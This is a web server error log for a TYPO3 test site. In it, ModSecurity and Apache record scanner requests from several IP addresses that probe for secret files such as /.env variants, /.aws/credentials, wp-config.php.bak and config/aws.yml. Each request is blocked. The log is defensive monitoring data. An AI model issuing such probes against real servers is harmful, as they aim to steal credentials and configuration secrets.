[Tue Feb 03 13:09:26.862017 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aYHldmkgoJaKC5jg5OxyuwAAAAk"]
[Tue Feb 03 13:09:26.882850 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aYHldmkgoJaKC5jg5OxyvAAAAAk"]
[Tue Feb 03 13:09:26.884801 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aYHldmkgoJaKC5jg5OxyvAAAAAk"]
[Tue Feb 03 13:09:26.884965 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aYHldmkgoJaKC5jg5OxyvAAAAAk"]
[Tue Feb 03 13:09:26.942374 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aYHldmkgoJaKC5jg5OxyvgAAAAk"]
[Tue Feb 03 13:09:26.942568 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aYHldmkgoJaKC5jg5OxyvgAAAAk"]
[Tue Feb 03 13:09:26.942721 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aYHldmkgoJaKC5jg5OxyvgAAAAk"]
[Tue Feb 03 13:09:26.963444 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aYHldmkgoJaKC5jg5OxyvwAAAAk"]
[Tue Feb 03 13:09:26.963620 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aYHldmkgoJaKC5jg5OxyvwAAAAk"]
[Tue Feb 03 13:09:26.963768 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aYHldmkgoJaKC5jg5OxyvwAAAAk"]
[Tue Feb 03 13:09:26.987086 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aYHldmkgoJaKC5jg5OxywAAAAAk"]
[Tue Feb 03 13:09:26.987266 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aYHldmkgoJaKC5jg5OxywAAAAAk"]
[Tue Feb 03 13:09:26.987413 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aYHldmkgoJaKC5jg5OxywAAAAAk"]
[Tue Feb 03 13:09:27.007682 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aYHld2kgoJaKC5jg5OxywQAAAAk"]
[Tue Feb 03 13:09:27.007870 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aYHld2kgoJaKC5jg5OxywQAAAAk"]
[Tue Feb 03 13:09:27.008018 2026] [:error] [pid 1843381] [client 195.178.110.33:53510] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aYHld2kgoJaKC5jg5OxywQAAAAk"]
[Tue Feb 03 13:09:59.859698 2026] [:error] [pid 1833927] [client 195.178.110.33:59754] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aYHllxcScgBearvs1jYcjQAAAAQ"]
[Tue Feb 03 13:09:59.859953 2026] [:error] [pid 1833927] [client 195.178.110.33:59754] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aYHllxcScgBearvs1jYcjQAAAAQ"]
[Tue Feb 03 13:09:59.860127 2026] [:error] [pid 1833927] [client 195.178.110.33:59754] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aYHllxcScgBearvs1jYcjQAAAAQ"]
[Tue Feb 03 13:10:07.252085 2026] [:error] [pid 1833926] [client 195.178.110.33:51388] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aYHln9AEDj_XQhd9DReYIQAAAAM"]
[Tue Feb 03 13:10:07.252333 2026] [:error] [pid 1833926] [client 195.178.110.33:51388] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aYHln9AEDj_XQhd9DReYIQAAAAM"]
[Tue Feb 03 13:10:07.252511 2026] [:error] [pid 1833926] [client 195.178.110.33:51388] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aYHln9AEDj_XQhd9DReYIQAAAAM"]
[Tue Feb 03 13:10:31.333003 2026] [:error] [pid 1843379] [client 195.178.110.33:44088] [client 195.178.110.33] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aYHlt8jmlDJOeCd6_UCXmQAAAAc"]
[Tue Feb 03 13:10:31.333244 2026] [:error] [pid 1843379] [client 195.178.110.33:44088] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aYHlt8jmlDJOeCd6_UCXmQAAAAc"]
[Tue Feb 03 13:10:31.333412 2026] [:error] [pid 1843379] [client 195.178.110.33:44088] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aYHlt8jmlDJOeCd6_UCXmQAAAAc"]
[Tue Feb 03 13:10:54.227998 2026] [:error] [pid 1843381] [client 195.178.110.33:36154] [client 195.178.110.33] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aYHlzmkgoJaKC5jg5OxywgAAAAk"]
[Tue Feb 03 13:10:54.228252 2026] [:error] [pid 1843381] [client 195.178.110.33:36154] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aYHlzmkgoJaKC5jg5OxywgAAAAk"]
[Tue Feb 03 13:10:54.228417 2026] [:error] [pid 1843381] [client 195.178.110.33:36154] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aYHlzmkgoJaKC5jg5OxywgAAAAk"]
[Tue Feb 03 13:10:59.323571 2026] [authz_core:error] [pid 1833999] [client 195.178.110.33:36172] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Tue Feb 03 19:13:07.486690 2026] [:error] [pid 1833925] [client 139.59.224.88:56498] [client 139.59.224.88] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aYI6s-a85s69zS4gnnjjGwAAAAI"]
[Tue Feb 03 19:13:07.486997 2026] [:error] [pid 1833925] [client 139.59.224.88:56498] [client 139.59.224.88] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aYI6s-a85s69zS4gnnjjGwAAAAI"]
[Tue Feb 03 19:13:07.487161 2026] [:error] [pid 1833925] [client 139.59.224.88:56498] [client 139.59.224.88] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aYI6s-a85s69zS4gnnjjGwAAAAI"]
[Sun Feb 08 15:06:19.718087 2026] [:error] [pid 1944084] [client 185.214.74.94:44530] [client 185.214.74.94] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aYiYW0ZhSfKe_HqswMGcTAAAAAY"]
[Sun Feb 08 15:06:19.719421 2026] [:error] [pid 1944084] [client 185.214.74.94:44530] [client 185.214.74.94] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aYiYW0ZhSfKe_HqswMGcTAAAAAY"]
[Sun Feb 08 15:06:19.719590 2026] [:error] [pid 1944084] [client 185.214.74.94:44530] [client 185.214.74.94] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aYiYW0ZhSfKe_HqswMGcTAAAAAY"]
[Tue Feb 10 09:59:28.209372 2026] [:error] [pid 1985788] [client 178.128.62.58:58054] [client 178.128.62.58] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aYrzcOMB_amgffDd65wFxQAAAAI"], referer: http://surf.test.indacotrentino.com/.env
[Tue Feb 10 09:59:28.210743 2026] [:error] [pid 1985788] [client 178.128.62.58:58054] [client 178.128.62.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aYrzcOMB_amgffDd65wFxQAAAAI"], referer: http://surf.test.indacotrentino.com/.env
[Tue Feb 10 09:59:28.211032 2026] [:error] [pid 1985788] [client 178.128.62.58:58054] [client 178.128.62.58] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aYrzcOMB_amgffDd65wFxQAAAAI"], referer: http://surf.test.indacotrentino.com/.env
[Tue Feb 10 09:59:30.319883 2026] [authz_core:error] [pid 1985788] [client 178.128.62.58:58054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config, referer: http://surf.test.indacotrentino.com/config/aws.yml
[Tue Feb 10 09:59:31.001860 2026] [authz_core:error] [pid 1985788] [client 178.128.62.58:58054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak, referer: http://surf.test.indacotrentino.com/.env.bak
[Tue Feb 10 09:59:31.721416 2026] [:error] [pid 1985788] [client 178.128.62.58:58054] [client 178.128.62.58] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aYrzc-MB_amgffDd65wFzwAAAAI"], referer: http://surf.test.indacotrentino.com/.aws/credentials
[Tue Feb 10 09:59:31.721703 2026] [:error] [pid 1985788] [client 178.128.62.58:58054] [client 178.128.62.58] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aYrzc-MB_amgffDd65wFzwAAAAI"], referer: http://surf.test.indacotrentino.com/.aws/credentials
